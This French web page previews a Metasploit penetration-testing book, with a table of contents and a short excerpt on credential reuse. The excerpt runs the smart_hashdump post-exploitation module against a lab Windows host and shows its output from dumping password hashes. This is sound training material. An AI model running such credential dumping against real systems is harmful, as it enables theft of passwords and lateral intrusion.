Titre, auteur...

Qu’est-ce qu’un test d’intrusion ?

Quels sont les différents types de tests d’intrusion ?

Quelles sont les différentes phases d’un test d’intrusion ?

L’histoire de Metasploit

Les différentes versions de Metasploit

Pourquoi ce livre ?

Rappel sur l’éthique des tests

Installation native de Metasploit

Utilisation alternative

Maintenir Metasploit à jour

Créer votre image Docker personnalisée

Installation de Metasploitable

La terminologie

Les invites de commandes

Rappel sur les commandes utiles

L’initialisation de la base

Les espaces de travail

Import et export des données

Les hôtes et les services

Phase de reconnaissance passive

Phase de reconnaissance active

Choix des modules à utiliser

Préparation de la phase d’exploitation

Exploitation de Metasploit par Metasploit

Exploitation de Metasploitable par Metasploit

Exemple d’exploitation d’un Windows

Présentation des sessions

Listing des sessions et interactions

Gestion des sessions

Exploitation massive

Vers Meterpreter et au-delà

Présentation de Meterpreter

Les commandes de base de Meterpreter

Désactivation des logiciels de sécurité

Élévation des privilèges

Migration de processus

Enregistrement des frappes clavier

Accès à d’autres machines du réseau

1. Réutilisation des identifiants
2. Pivoter au sein des réseaux
a. Obtention d’informations réseau de la machine infectée
b. Interaction avec le nouveau sous-réseau

Les attaques sur les mots de passe

Création de charges malveillantes

Garder un accès aux machines

Suppression des traces

Présentation du Social-Engineering Toolkit

Spear-Phishing Attack Vectors

Website Attack Vectors

Infectious Media Generator

Create a Payload and Listener

Mass Mailer Attack

Arduino-Based Attack Vector

Wireless Access Point Attack Vector

QRCode Generator Attack Vector

Powershell Attack Vectors

Garder des traces

Tunner l’invite de commande Metasploit

Lire la documentation

Accès à d’autres machines du réseau `Réseau:accès à d’autres machines`

Dans le cas où le périmètre des tests le permet, il est possible de tenter d’accéder à d’autres machines du réseau.

Comme vu à la section Élévation des privilèges - À la recherche de fichiers intéressants, il est possible de trouver des informations sensibles au sein de certains fichiers. Néanmoins, d’autres techniques existent.

1. Réutilisation des identifiants

Nous avons vu qu’il est possible d’obtenir les hashs des identifiants LM/NTLM grâce aux commandes hashdump et smart_hashdump de Meterpreter : hashdump

msf6 post(windows/gather/smart_hashdump) > exploit  
[*] Running module against VICTIMEPC 
[*] Hashes will be saved to the database if one is connected. 
[+] Hashes will be saved in loot in JtR password file format to: 
[*] 
/root/.msf4/loot/20190618081455_default_192.168.0.29_windows.hashes_3 
08038.txt  
[*] Dumping password hashes... 
[*] Running as SYSTEM extracting hashes from registry 
[*]     Obtaining the boot key... 
[*]     Calculating the hboot key using SYSKEY 
073e3c624e24966502b500cba1fdeb0a... 
[*]     Obtaining the user list and keys... 
[*]     Decrypting user keys... 
[*]     Dumping password...

Découvrez

le livre :

je lis la suite !

Aussi inclus dans nos :

Précédent

Enregistrement des frappes clavier

Suivant

Les attaques sur les mots de passe